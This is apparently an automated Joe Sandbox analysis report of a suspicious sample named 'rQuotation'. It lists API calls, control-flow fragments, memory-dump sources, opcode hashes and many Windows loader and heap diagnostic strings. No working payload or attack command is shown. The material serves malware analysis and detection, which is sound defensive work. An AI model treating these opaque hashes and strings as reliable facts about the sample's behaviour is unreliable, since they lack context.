• String ID:
• API String ID: 3298025750-0

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 98 86cfb3-86cff7 call 844623 call 86def3 RtlAllocateHeap
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,0085EAC4,?,?,00000000,?,0085EAC4,?,?,?), ref: 0086CFF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: b24cf5557b4f9675c1e456c300a1504aea191f31fd828e8cf7209fc0f651cbf3
                                                                                                                                                                                                                                                • Instruction ID: af0a471421fd5d0bbd051aa01647370466ed494a06c84b70e93fc7d6d6879cf0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b24cf5557b4f9675c1e456c300a1504aea191f31fd828e8cf7209fc0f651cbf3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70E06D72604309BBD610EE5CDC41FAB37ACEFC9710F004419F908A7241CA70B9118AB5

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 113 86d053-86d08c call 844623 call 86def3 ExitProcess
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,D43193C6,?,?,D43193C6), ref: 0086D087
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                • Opcode ID: 60c8520bca689abc692f2d56e9f6b485b0ffbb8f78683b2f57a47bea02d742e5
                                                                                                                                                                                                                                                • Instruction ID: ceaf1ad652592fcfbf462136131ab596407f55bf238b074ce1b7b8bc33624c15
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60c8520bca689abc692f2d56e9f6b485b0ffbb8f78683b2f57a47bea02d742e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56E046363002587BD220BA6DDC41F9B776CFBCA724F014419FA08AB242D6B1BA0086A2

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 118 857d88-857d91 119 857d93-857d98 118->119 120 857d22-857d27 LdrLoadDll 118->120 121 857d2a-857d2d 120->121
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00857D25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.2021778481.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_840000_rQuotation.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 30a2c10e8c3c889923439468e507f728740e7998c8fd295b7ec1871b54246c68
                                                                                                                                                                                                                                                • Instruction ID: 11cf799af3adf79fa320ddd98a68344f7233b24111f49f5bb41352ef8194fc84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30a2c10e8c3c889923439468e507f728740e7998c8fd295b7ec1871b54246c68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EC01218E2C288DA8F6786F81451229FF25AD9616270C87CAAC4886A45D63ACA568742

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 122 1702c0a-1702c0f 123 1702c11-1702c18 122->123 124 1702c1f-1702c26 LdrInitializeThunk 122->124
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                • Opcode ID: 6eb89dcf897c22b7cd4b6cb7a7127af612bcb8998379ad6e66150812ca2be422
                                                                                                                                                                                                                                                • Instruction ID: dfc15c05df4d4070d86287a06ab2f98d55d2f4987570a5b24f5a7e673a8a476c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6eb89dcf897c22b7cd4b6cb7a7127af612bcb8998379ad6e66150812ca2be422
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45B09B739455C5C6DB12E764460C717B94077D1701F15C075D2030695F8738C1D1E276
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-2160512332
                                                                                                                                                                                                                                                • Opcode ID: 6bb19adf42068599eda347e22a22847a749ec4337790252f9d615747b614a222
                                                                                                                                                                                                                                                • Instruction ID: c8abcdb896b6ce164262ac25a27afaf3abc7d240793a13d8458e7800550013d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bb19adf42068599eda347e22a22847a749ec4337790252f9d615747b614a222
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E92AC71608342ABE721DF28C884B6BFBE9BB84754F04492DFA94D7252D770E844CB92
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-3089669407
                                                                                                                                                                                                                                                • Opcode ID: 5a5fdc806523391d5e112860d02746453bc571ded63596a88962ca3a4f98dfaf
                                                                                                                                                                                                                                                • Instruction ID: 54ed08e7deb05ad4757c0e61eb84ee0e3c910bd7293dd30cc675bbba9f0ea79c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a5fdc806523391d5e112860d02746453bc571ded63596a88962ca3a4f98dfaf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D08120B2D01219AF9B22EAE8DDD4FEFB7BEAB046147444526FA01F7114E730DD458BA0
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • @, xrefs: 01766277
                                                                                                                                                                                                                                                • PreferredUILanguages, xrefs: 017663D1
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 01765FE1
                                                                                                                                                                                                                                                • @, xrefs: 01766027
                                                                                                                                                                                                                                                • InstallLanguageFallback, xrefs: 01766050
                                                                                                                                                                                                                                                • @, xrefs: 017661B0
                                                                                                                                                                                                                                                • Control Panel\Desktop, xrefs: 0176615E
                                                                                                                                                                                                                                                • LanguageConfiguration, xrefs: 01766420
                                                                                                                                                                                                                                                • @, xrefs: 017663A0
                                                                                                                                                                                                                                                • LanguageConfigurationPending, xrefs: 01766221
                                                                                                                                                                                                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0176635D
                                                                                                                                                                                                                                                • PreferredUILanguagesPending, xrefs: 017661D2
                                                                                                                                                                                                                                                • @, xrefs: 0176647A
                                                                                                                                                                                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 01765A84
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                                                                                                                                                                                • API String ID: 0-1325123933
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • corrupted critical section, xrefs: 017354C2
                                                                                                                                                                                                                                                • Critical section address, xrefs: 01735425, 017354BC, 01735534
                                                                                                                                                                                                                                                • Address of the debug info found in the active list., xrefs: 017354AE, 017354FA
                                                                                                                                                                                                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017354E2
                                                                                                                                                                                                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01735543
                                                                                                                                                                                                                                                • Critical section address., xrefs: 01735502
                                                                                                                                                                                                                                                • Thread identifier, xrefs: 0173553A
                                                                                                                                                                                                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017354CE
                                                                                                                                                                                                                                                • 8, xrefs: 017352E3
                                                                                                                                                                                                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0173540A, 01735496, 01735519
                                                                                                                                                                                                                                                • Critical section debug info address, xrefs: 0173541F, 0173552E
                                                                                                                                                                                                                                                • undeleted critical section in freed memory, xrefs: 0173542B
                                                                                                                                                                                                                                                • double initialized or corrupted critical section, xrefs: 01735508
                                                                                                                                                                                                                                                • Invalid debug info address of this critical section, xrefs: 017354B6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                                • API String ID: 0-2368682639
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01732602
                                                                                                                                                                                                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01732624
                                                                                                                                                                                                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01732498
                                                                                                                                                                                                                                                • @, xrefs: 0173259B
                                                                                                                                                                                                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017325EB
                                                                                                                                                                                                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01732412
                                                                                                                                                                                                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01732409
                                                                                                                                                                                                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0173261F
                                                                                                                                                                                                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017324C0
                                                                                                                                                                                                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017322E4
                                                                                                                                                                                                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01732506
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                                                                                                                                                                                                                • API String ID: 0-360209818
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • VerifierFlags, xrefs: 01748C50
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01748A3D
                                                                                                                                                                                                                                                • VerifierDlls, xrefs: 01748CBD
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01748A67
                                                                                                                                                                                                                                                • HandleTraces, xrefs: 01748C8F
                                                                                                                                                                                                                                                • VerifierDebug, xrefs: 01748CA5
                                                                                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01748B8F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01719A01
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 016B6496
                                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 017199F4, 01719A07, 01719A30
                                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01719A2A
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01719A11, 01719A3A
                                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017199ED
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017321BF
                                                                                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01732160, 0173219A, 017321BA
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01732180
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01732178
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01732165
                                                                                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0173219F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
